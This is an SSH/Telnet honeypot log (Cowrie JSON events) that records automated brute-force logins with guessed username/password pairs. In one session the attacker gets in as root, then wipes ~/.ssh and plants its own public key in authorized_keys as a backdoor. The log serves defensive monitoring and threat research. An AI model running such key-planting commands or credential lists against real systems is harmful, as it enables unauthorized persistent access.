{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:04:11.411183Z","src_ip":"185.255.91.51","session":"da717ecec5bb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:04:12.009195Z","src_ip":"185.255.91.51","session":"da717ecec5bb"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:12.113680Z","src_ip":"185.255.91.51","session":"da717ecec5bb"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:12.116997Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:26.519060Z","src_ip":"212.227.235.229","session":"fb7444e3fa09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48225,"dst_ip":"1.2.3.4","dst_port":23,"session":"7deae5eb6422","protocol":"telnet","message":"New connection: 212.227.235.229:48225 (1.2.3.4:23) [session: 7deae5eb6422]","sensor":"my-vps","timestamp":"2025-09-08T15:04:29.769642Z"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":48550,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e978a873c16","protocol":"ssh","message":"New connection: 158.51.124.56:48550 (1.2.3.4:22) [session: 8e978a873c16]","sensor":"my-vps","timestamp":"2025-09-08T15:04:32.406571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:04:32.407295Z","src_ip":"158.51.124.56","session":"8e978a873c16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:04:32.545970Z","src_ip":"158.51.124.56","session":"8e978a873c16"}
{"eventid":"cowrie.login.failed","username":"hammer","password":"123456789","message":"login attempt [hammer/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T15:04:33.098204Z","src_ip":"158.51.124.56","session":"8e978a873c16"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:34.239000Z","src_ip":"158.51.124.56","session":"8e978a873c16"}
{"eventid":"cowrie.session.closed","duration":12.920259475708008,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:42.689837Z","src_ip":"212.227.235.229","session":"7deae5eb6422"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":47844,"dst_ip":"1.2.3.4","dst_port":22,"session":"9420095a166d","protocol":"ssh","message":"New connection: 185.255.91.51:47844 (1.2.3.4:22) [session: 9420095a166d]","sensor":"my-vps","timestamp":"2025-09-08T15:05:16.813948Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:05:16.814878Z","src_ip":"185.255.91.51","session":"9420095a166d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:05:16.916589Z","src_ip":"185.255.91.51","session":"9420095a166d"}
{"eventid":"cowrie.login.failed","username":"jira","password":"12345678","message":"login attempt [jira/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T15:05:17.372128Z","src_ip":"185.255.91.51","session":"9420095a166d"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:05:18.475238Z","src_ip":"185.255.91.51","session":"9420095a166d"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":46110,"dst_ip":"1.2.3.4","dst_port":22,"session":"a09276184065","protocol":"ssh","message":"New connection: 158.51.124.56:46110 (1.2.3.4:22) [session: a09276184065]","sensor":"my-vps","timestamp":"2025-09-08T15:05:35.602269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:05:35.603201Z","src_ip":"158.51.124.56","session":"a09276184065"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:05:35.741396Z","src_ip":"158.51.124.56","session":"a09276184065"}
{"eventid":"cowrie.login.failed","username":"test1","password":"1qaz2WSX","message":"login attempt [test1/1qaz2WSX] failed","sensor":"my-vps","timestamp":"2025-09-08T15:05:36.335740Z","src_ip":"158.51.124.56","session":"a09276184065"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:05:37.476212Z","src_ip":"158.51.124.56","session":"a09276184065"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":47920,"dst_ip":"1.2.3.4","dst_port":22,"session":"719f512930b9","protocol":"ssh","message":"New connection: 185.255.91.51:47920 (1.2.3.4:22) [session: 719f512930b9]","sensor":"my-vps","timestamp":"2025-09-08T15:06:27.504501Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:06:27.505414Z","src_ip":"185.255.91.51","session":"719f512930b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:06:27.603649Z","src_ip":"185.255.91.51","session":"719f512930b9"}
{"eventid":"cowrie.login.failed","username":"build","password":"password","message":"login attempt [build/password] failed","sensor":"my-vps","timestamp":"2025-09-08T15:06:28.037969Z","src_ip":"185.255.91.51","session":"719f512930b9"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:06:29.137222Z","src_ip":"185.255.91.51","session":"719f512930b9"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":43668,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e03c8d18425","protocol":"ssh","message":"New connection: 158.51.124.56:43668 (1.2.3.4:22) [session: 5e03c8d18425]","sensor":"my-vps","timestamp":"2025-09-08T15:06:40.362304Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:06:40.362964Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:06:40.501421Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.login.success","username":"root","password":"000000000","message":"login attempt [root/000000000] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:06:41.095659Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:06:41.432559Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:06:41.433398Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:06:41.434575Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:06:41.574535Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:06:41.867321Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:06:41.867999Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:06:42.008371Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:06:42.009253Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":44104,"dst_ip":"1.2.3.4","dst_port":22,"session":"3532418a8486","protocol":"ssh","message":"New connection: 158.51.124.56:44104 (1.2.3.4:22) [session: 3532418a8486]","sensor":"my-vps","timestamp":"2025-09-08T15:06:42.148725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:06:42.149593Z","src_ip":"158.51.124.56","session":"3532418a8486"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:06:42.289553Z","src_ip":"158.51.124.56","session":"3532418a8486"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:06:42.890370Z","src_ip":"158.51.124.56","session":"3532418a8486"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:06:44.033311Z","src_ip":"158.51.124.56","session":"3532418a8486"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":44880,"dst_ip":"1.2.3.4","dst_port":22,"session":"334894387951","protocol":"ssh","message":"New connection: 158.51.124.56:44880 (1.2.3.4:22) [session: 334894387951]","sensor":"my-vps","timestamp":"2025-09-08T15:06:44.171202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:06:44.172152Z","src_ip":"158.51.124.56","session":"334894387951"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:06:44.311954Z","src_ip":"158.51.124.56","session":"334894387951"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:06:44.911488Z","src_ip":"158.51.124.56","session":"334894387951"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:06:45.052354Z","src_ip":"158.51.124.56","session":"5e03c8d18425"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:06:45.053233Z","src_ip":"158.51.124.56","session":"334894387951"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":37744,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeb851ff42b6","protocol":"ssh","message":"New connection: 8.138.136.155:37744 (1.2.3.4:22) [session: eeb851ff42b6]","sensor":"my-vps","timestamp":"2025-09-08T15:07:22.571106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T15:07:22.571901Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T15:07:22.573017Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T15:07:23.791965Z","src_ip":"8.138.136.155","session":"eeb851ff42b6"}
